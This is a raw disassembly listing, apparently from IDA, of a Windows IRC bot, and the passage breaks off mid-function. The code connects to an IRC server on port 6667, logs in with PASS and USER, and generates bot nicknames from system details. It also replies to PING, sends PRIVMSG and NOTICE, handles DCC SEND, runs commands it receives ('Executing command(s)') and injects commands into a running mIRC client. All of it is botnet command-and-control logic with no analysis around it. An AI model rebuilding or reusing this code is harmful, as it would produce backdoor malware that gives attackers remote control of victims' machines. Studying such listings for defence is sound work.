; Attributes: bp-based frame
sub_40CEB0 proc near ; CODE XREF: sub_40A9CF+14CE�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_4]
call sub_40CA29
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40CEC9
jmp short locret_40CF23
; ---------------------------------------------------------------------------
loc_40CEC9: ; CODE XREF: sub_40CEB0+15�j
push 327h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40CEDF
jmp short locret_40CF23
; ---------------------------------------------------------------------------
loc_40CEDF: ; CODE XREF: sub_40CEB0+2B�j
push 180h
push [ebp+var_8]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 184h
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+var_8]
push offset aExecutingComma ; "Executing command(s): %s"
push 0
push [ebp+var_4]
push offset sub_40C93C
call sub_4095A4
add esp, 14h
locret_40CF23: ; CODE XREF: sub_40CEB0+17�j
; sub_40CEB0+2D�j
leave
retn
sub_40CEB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CF25 proc near ; CODE XREF: sub_4020C2+B3�p
; sub_40D871+59B�p ...
push ebp
mov ebp, esp
mov eax, ds:dword_41EA74
pop ebp
retn
sub_40CF25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CF2F proc near ; CODE XREF: sub_40D366+D�p
; sub_40D366+8E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
jz short loc_40CF9E
push [ebp+arg_0]
push offset dword_41E968
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp [ebp+arg_4], 0
jz short loc_40CF60
push [ebp+arg_4]
push offset dword_41EA68
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40CF71
; ---------------------------------------------------------------------------
loc_40CF60: ; CODE XREF: sub_40CF2F+1E�j
push offset a6667 ; "6667"
push offset dword_41EA68
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40CF71: ; CODE XREF: sub_40CF2F+2F�j
cmp [ebp+arg_8], 0
jz short loc_40CF88
push [ebp+arg_8]
push offset byte_41E7E8
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40CF99
; ---------------------------------------------------------------------------
loc_40CF88: ; CODE XREF: sub_40CF2F+46�j
push offset byte_41DF00
push offset byte_41E7E8
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40CF99: ; CODE XREF: sub_40CF2F+57�j
jmp loc_40D020
; ---------------------------------------------------------------------------
loc_40CF9E: ; CODE XREF: sub_40CF2F+9�j
and [ebp+var_4], 0
jmp short loc_40CFAB
; ---------------------------------------------------------------------------
loc_40CFA4: ; CODE XREF: sub_40CF2F+8B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40CFAB: ; CODE XREF: sub_40CF2F+73�j
mov eax, [ebp+var_4]
imul eax, 0Ch
cmp ds:off_41DB18[eax], 0
jz short loc_40CFBC
jmp short loc_40CFA4
; ---------------------------------------------------------------------------
loc_40CFBC: ; CODE XREF: sub_40CF2F+89�j
call sub_410422
xor edx, edx
div [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
imul eax, 0Ch
push ds:off_41DB18[eax]
push offset dword_41E968
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_8]
imul eax, 0Ch
push ds:off_41DB1C[eax]
push offset dword_41EA68
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_8]
imul eax, 0Ch
cmp ds:dword_41DB20[eax], 0
jz short loc_40D020
mov eax, [ebp+var_8]
imul eax, 0Ch
push ds:dword_41DB20[eax]
push offset byte_41E7E8
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D020: ; CODE XREF: sub_40CF2F:loc_40CF99�j
; sub_40CF2F+D7�j
push offset dword_41E968
call sub_4105AD
pop ecx
push offset dword_41EA68
call sub_4105AD
pop ecx
push offset byte_41E7E8
call sub_4105AD
pop ecx
leave
retn
sub_40CF2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D043 proc near ; CODE XREF: sub_40D366+7F�p
; sub_40D871+619�p
var_250 = dword ptr -250h
var_24C = byte ptr -24Ch
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_18C = dword ptr -18Ch
var_188 = dword ptr -188h
var_184 = byte ptr -184h
var_104 = byte ptr -104h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 250h
push edi
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_80]
push eax
call sub_40668F
add esp, 0Ch
movsx eax, ds:byte_41E7E8
test eax, eax
jz short loc_40D099
push offset byte_41E7E8
call sub_4105FB
pop ecx
push offset byte_41E7E8
push offset aPassS ; "PASS %s"
call sub_40D6CB
pop ecx
pop ecx
push offset byte_41E7E8
call sub_4105AD
pop ecx
loc_40D099: ; CODE XREF: sub_40D043+2D�j
cmp [ebp+arg_0], 0
jz loc_40D132
movsx eax, ds:byte_41EF98
test eax, eax
jz short loc_40D0C3
push offset byte_41EF98
lea eax, [ebp+var_184]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40D0D6
; ---------------------------------------------------------------------------
loc_40D0C3: ; CODE XREF: sub_40D043+69�j
lea eax, [ebp+var_184]
push eax
push offset byte_41EF98
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D0D6: ; CODE XREF: sub_40D043+7E�j
movsx eax, ds:byte_41F118
test eax, eax
jz short loc_40D0F6
push offset byte_41F118
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40D109
; ---------------------------------------------------------------------------
loc_40D0F6: ; CODE XREF: sub_40D043+9C�j
lea eax, [ebp+var_104]
push eax
push offset byte_41F118
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D109: ; CODE XREF: sub_40D043+B1�j
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_184]
push eax
push offset aUserSSSS ; "USER %s %s %s :%s"
call sub_40D6CB
add esp, 14h
loc_40D132: ; CODE XREF: sub_40D043+5A�j
cmp [ebp+arg_4], 0
jz loc_40D363
cmp [ebp+arg_0], 0
jz short loc_40D163
movsx eax, ds:byte_41EF18
test eax, eax
jz short loc_40D163
push offset byte_41EF18
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40D363
; ---------------------------------------------------------------------------
loc_40D163: ; CODE XREF: sub_40D043+FD�j
; sub_40D043+108�j
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_188], eax
cmp [ebp+var_188], 4
jnb short loc_40D18D
call sub_406AE7
test eax, eax
jz loc_40D31F
loc_40D18D: ; CODE XREF: sub_40D043+13B�j
call sub_406A23
lea eax, [ebp+var_24C]
push eax
call sub_408342
pop ecx
test eax, eax
jnz short loc_40D1B6
push offset aUnk ; "UNK"
lea eax, [ebp+var_24C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D1B6: ; CODE XREF: sub_40D043+15E�j
call sub_408E8E
cmp eax, 400h
jbe short loc_40D1CF
call sub_408E8E
mov [ebp+var_250], eax
jmp short loc_40D1D9
; ---------------------------------------------------------------------------
loc_40D1CF: ; CODE XREF: sub_40D043+17D�j
mov [ebp+var_250], 400h
loc_40D1D9: ; CODE XREF: sub_40D043+18A�j
mov eax, [ebp+var_250]
shr eax, 0Ah
mov [ebp+var_228], eax
call sub_408887
mov [ebp+var_18C], eax
mov [ebp+var_224], offset aB ; "B"
cmp [ebp+var_18C], 2EEh
jnb short loc_40D213
mov [ebp+var_224], offset aA ; "A"
loc_40D213: ; CODE XREF: sub_40D043+1C4�j
cmp [ebp+var_18C], 1F4h
jnb short loc_40D229
mov [ebp+var_224], offset aG ; "G"
loc_40D229: ; CODE XREF: sub_40D043+1DA�j
and [ebp+var_22C], 0
mov [ebp+var_220], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_21C]
rep stosd
lea eax, [ebp+var_220]
push eax
call ds:dword_417030 ; GetVersionExA
cmp [ebp+var_21C], 5
jnz short loc_40D270
cmp [ebp+var_218], 1
jnz short loc_40D270
mov [ebp+var_22C], 1
loc_40D270: ; CODE XREF: sub_40D043+218�j
; sub_40D043+221�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
cmp [ebp+var_22C], 0
setz al
dec eax
and eax, 2Fh
add eax, 2Dh
movsx eax, al
push eax
push [ebp+var_224]
push [ebp+var_228]
push 5Dh
push [ebp+var_188]
push 5Bh
push 5Dh
lea eax, [ebp+var_24C]
push eax
push 5Bh
push offset aCSCCUCUSCCC ; "%c%s%c%c%u%c%u%s%c%c%c"
lea eax, [ebp+var_80]
push eax
call sub_416B5E ; sprintf
add esp, 34h
movsx eax, ds:byte_41DC08
test eax, eax
jz short loc_40D31D
push offset byte_41DC08
push offset dword_41DB88
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41DB88
call sub_4105FB
pop ecx
movsx eax, ds:byte_41DC88
test eax, eax
jz short loc_40D31D
push offset byte_41DC88
push offset dword_41EE18
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41EE18
call sub_4105FB
pop ecx
loc_40D31D: ; CODE XREF: sub_40D043+295�j
; sub_40D043+2BC�j
jmp short loc_40D343
; ---------------------------------------------------------------------------
loc_40D31F: ; CODE XREF: sub_40D043+144�j
push offset dword_41DB78
lea eax, [ebp+var_80]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_80]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_80]
push eax
call sub_40D7E5
pop ecx
loc_40D343: ; CODE XREF: sub_40D043:loc_40D31D�j
lea eax, [ebp+var_80]
push eax
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
lea eax, [ebp+var_80]
push eax
push offset byte_41EF18
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D363: ; CODE XREF: sub_40D043+F3�j
; sub_40D043+11B�j
pop edi
leave
retn
sub_40D043 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D366 proc near ; CODE XREF: sub_40A9CF+1521�p
; sub_40D871+4A7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CF2F
add esp, 0Ch
push ds:dword_41EA74
call sub_40538D
pop ecx
mov [ebp+var_4], 0EA60h
loc_40D38E: ; CODE XREF: sub_40D366:loc_40D419�j
push offset dword_41E968
call sub_4105FB
pop ecx
push offset dword_41EA68
call sub_4105FB
pop ecx
push 2710h
push 1
push offset dword_41EA68
push offset dword_41E968
call sub_4050EA
add esp, 10h
mov ds:dword_41EA74, eax
push offset dword_41E968
call sub_4105AD
pop ecx
push offset dword_41EA68
call sub_4105AD
pop ecx
cmp ds:dword_41EA74, 0
jz short loc_40D3EE
push 1
push 1
call sub_40D043
pop ecx
pop ecx
jmp short locret_40D41E
; ---------------------------------------------------------------------------
loc_40D3EE: ; CODE XREF: sub_40D366+79�j
push 0
push 0
push 0
call sub_40CF2F
add esp, 0Ch
push [ebp+var_4]
call ds:dword_41709C ; Sleep
cmp [ebp+var_4], 0A4CB80h
jge short loc_40D419
mov eax, [ebp+var_4]
add eax, 0EA60h
mov [ebp+var_4], eax
loc_40D419: ; CODE XREF: sub_40D366+A6�j
jmp loc_40D38E
; ---------------------------------------------------------------------------
locret_40D41E: ; CODE XREF: sub_40D366+86�j
leave
retn
sub_40D366 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D420 proc near ; CODE XREF: sub_4020C2+1DE�p
; sub_40A9CF+1219�p ...
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
push [ebp+arg_0]
push offset aNoticeS ; "NOTICE %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_8]
push eax
mov eax, [ebp+var_8]
lea eax, [ebp+eax+var_1008]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1008]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push ds:dword_41EA74
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D420 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D4AB proc near ; CODE XREF: sub_4020C2+21B�p
; sub_40332B+1A6�p ...
var_1008 = dword ptr -1008h
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
push [ebp+arg_0]
push offset aPrivmsgS ; "PRIVMSG %s :"
lea eax, [ebp+var_1004]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_1008], eax
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_1008]
push eax
mov eax, [ebp+var_1008]
lea eax, [ebp+eax+var_1004]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1004]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1004]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1004]
push eax
push ds:dword_41EA74
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D4AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D53F proc near ; CODE XREF: sub_401244+51�p
; sub_401244+41E�p ...
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+198h]
test eax, eax
jz short loc_40D55F
jmp locret_40D6C9
; ---------------------------------------------------------------------------
loc_40D55F: ; CODE XREF: sub_40D53F+19�j
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 1
jnz short loc_40D58F
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset aNoticeS ; "NOTICE %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D58F: ; CODE XREF: sub_40D53F+2E�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jnz short loc_40D5BB
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset dword_41A058
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D5BB: ; CODE XREF: sub_40D53F+5A�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D5E7
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset dword_41A048
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D5E7: ; CODE XREF: sub_40D53F+86�j
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset aPrivmsgS ; "PRIVMSG %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
loc_40D605: ; CODE XREF: sub_40D53F+4E�j
; sub_40D53F+7A�j ...
mov eax, [ebp+arg_0]
cmp dword ptr [eax+19Fh], 0
jz short loc_40D63C
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jz short loc_40D629
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D63C
loc_40D629: ; CODE XREF: sub_40D53F+DC�j
push offset dword_41A03C
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
loc_40D63C: ; CODE XREF: sub_40D53F+D0�j
; sub_40D53F+E8�j
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_8]
push eax
mov eax, [ebp+var_8]
lea eax, [ebp+eax+var_1008]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jz short loc_40D680
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D693
loc_40D680: ; CODE XREF: sub_40D53F+133�j
push offset dword_41A038
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
loc_40D693: ; CODE XREF: sub_40D53F+13F�j
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1008]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push ds:dword_41EA74
call sub_4053BF
add esp, 0Ch
locret_40D6C9: ; CODE XREF: sub_40D53F+1B�j
leave
retn
sub_40D53F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D6CB proc near ; CODE XREF: sub_40332B+205�p
; sub_40332B+212�p ...
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1004h
call sub_416BC0
lea eax, [ebp+arg_4]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_0]
push 1000h
lea eax, [ebp+var_1004]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1004]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1004]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1004]
push eax
push ds:dword_41EA74
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D6CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D734 proc near ; CODE XREF: sub_40D74D:loc_40D75E�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 0
push offset aMirc ; "mIRC"
call ds:dword_4171E8 ; FindWindowA
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_40D734 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D74D proc near ; CODE XREF: sub_40A9CF+926�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 0
jnz short loc_40D75E
jmp locret_40D7E3
; ---------------------------------------------------------------------------
loc_40D75E: ; CODE XREF: sub_40D74D+A�j
call sub_40D734
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40D76E
jmp short locret_40D7E3
; ---------------------------------------------------------------------------
loc_40D76E: ; CODE XREF: sub_40D74D+1D�j
push offset aMirc ; "mIRC"
push 1000h
push 0
push 4
push 0
push 0FFFFFFFFh
call ds:dword_4170C0 ; CreateFileMappingA
mov [ebp+var_8], eax
push 0
push 0
push 0
push 0F001Fh
push [ebp+var_8]
call ds:dword_4170BC ; MapViewOfFile
mov [ebp+var_C], eax
push [ebp+arg_0]
push [ebp+var_C]
call sub_416B5E ; sprintf
pop ecx
pop ecx
push 0
push 1
push 4C8h
push [ebp+var_4]
call ds:dword_4171EC ; SendMessageA
push 0
push 1
push 4C9h
push [ebp+var_4]
call ds:dword_4171EC ; SendMessageA
push [ebp+var_C]
call ds:dword_4170B8 ; UnmapViewOfFile
push [ebp+var_8]
call ds:dword_4170A4 ; CloseHandle
locret_40D7E3: ; CODE XREF: sub_40D74D+C�j
; sub_40D74D+1F�j
leave
retn
sub_40D74D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D7E5 proc near ; CODE XREF: sub_40A9CF+E3�p
; sub_40D043+2FA�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_40D803
; ---------------------------------------------------------------------------
loc_40D7FC: ; CODE XREF: sub_40D7E5:loc_40D86D�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40D803: ; CODE XREF: sub_40D7E5+15�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jge short locret_40D86F
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40D82E
push 39h
push 30h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_40D86D
; ---------------------------------------------------------------------------
loc_40D82E: ; CODE XREF: sub_40D7E5+32�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40D86D
call sub_410483
test eax, eax
jz short loc_40D85A
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_40D86D
; ---------------------------------------------------------------------------
loc_40D85A: ; CODE XREF: sub_40D7E5+5E�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
loc_40D86D: ; CODE XREF: sub_40D7E5+47�j
; sub_40D7E5+55�j ...
jmp short loc_40D7FC
; ---------------------------------------------------------------------------
locret_40D86F: ; CODE XREF: sub_40D7E5+24�j
leave
retn
sub_40D7E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D871 proc near ; CODE XREF: sub_40E618+321�p
var_7E8 = dword ptr -7E8h
var_7E4 = dword ptr -7E4h
var_7E0 = dword ptr -7E0h
var_7DC = byte ptr -7DCh
var_7D8 = dword ptr -7D8h
var_7D4 = dword ptr -7D4h
var_7D0 = dword ptr -7D0h
var_7CC = dword ptr -7CCh
var_7C8 = dword ptr -7C8h
var_7C4 = byte ptr -7C4h
var_7C0 = dword ptr -7C0h
var_7BC = byte ptr -7BCh
var_5BC = dword ptr -5BCh
var_5B8 = dword ptr -5B8h
var_5B4 = byte ptr -5B4h
var_4B4 = byte ptr -4B4h
var_490 = byte ptr -490h
var_390 = byte ptr -390h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_360 = dword ptr -360h
var_35C = dword ptr -35Ch
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_248 = byte ptr -248h
var_238 = dword ptr -238h
var_234 = byte ptr -234h
var_213 = byte ptr -213h
var_113 = dword ptr -113h
var_10F = byte ptr -10Fh
var_95 = dword ptr -95h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 7E8h
push edi
push offset aPing ; "PING"
mov eax, [ebp+arg_C]
push dword ptr [eax]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8A7
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
push offset aPongS ; "PONG %s"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8A7: ; CODE XREF: sub_40D871+1D�j
push offset aPong ; "PONG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8C2
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8C2: ; CODE XREF: sub_40D871+4A�j
push offset aMode ; "MODE"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8DD
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8DD: ; CODE XREF: sub_40D871+65�j
push offset aPrivmsg ; "PRIVMSG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DB2D
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jz loc_40DB2D
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax+1]
cmp eax, 1
jnz loc_40DB2D
push offset dword_41A14C
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DA81
mov eax, [ebp+arg_C]
cmp dword ptr [eax+10h], 0
jz loc_40DA81
push offset aSend ; "SEND"
mov eax, [ebp+arg_C]
push dword ptr [eax+10h]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DA81
cmp [ebp+arg_0], 0
jz loc_40DA81
mov eax, [ebp+arg_C]
cmp dword ptr [eax+14h], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+18h], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+1Ch], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+20h], 0
jnz short loc_40D98B
loc_40D986: ; CODE XREF: sub_40D871+F8�j
; sub_40D871+101�j ...
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D98B: ; CODE XREF: sub_40D871+113�j
mov eax, [ebp+arg_C]
mov eax, [eax+14h]
movsx eax, byte ptr [eax]
cmp eax, 22h
jnz short loc_40D99E
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D99E: ; CODE XREF: sub_40D871+126�j
mov eax, [ebp+arg_C]
push dword ptr [eax+20h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+20h]
and byte ptr [ecx+eax], 0
push [ebp+arg_4]
lea eax, [ebp+var_234]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41DB88
lea eax, [ebp+var_213]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
and [ebp+var_113], 0
push 7Ah
push 0
lea eax, [ebp+var_10F]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_95], 1
mov eax, [ebp+arg_C]
push dword ptr [eax+18h]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_238], eax
movzx eax, byte ptr [ebp+var_238]
push eax
mov eax, [ebp+var_238]
shr eax, 8
movzx eax, al
push eax
mov eax, [ebp+var_238]
shr eax, 10h
movzx eax, al
push eax
mov eax, [ebp+var_238]
shr eax, 18h
movzx eax, al
push eax
push offset dword_418A50
lea eax, [ebp+var_248]
push eax
call sub_416B5E ; sprintf
add esp, 18h
mov eax, [ebp+arg_C]
push dword ptr [eax+20h]
mov eax, [ebp+arg_C]
push dword ptr [eax+1Ch]
lea eax, [ebp+var_248]
push eax
mov eax, [ebp+arg_C]
push dword ptr [eax+14h]
push [ebp+arg_4]
lea eax, [ebp+var_234]
push eax
call sub_4024F3
add esp, 18h
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DA81: ; CODE XREF: sub_40D871+BA�j
; sub_40D871+C7�j ...
push offset dword_41A138
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz short loc_40DAAD
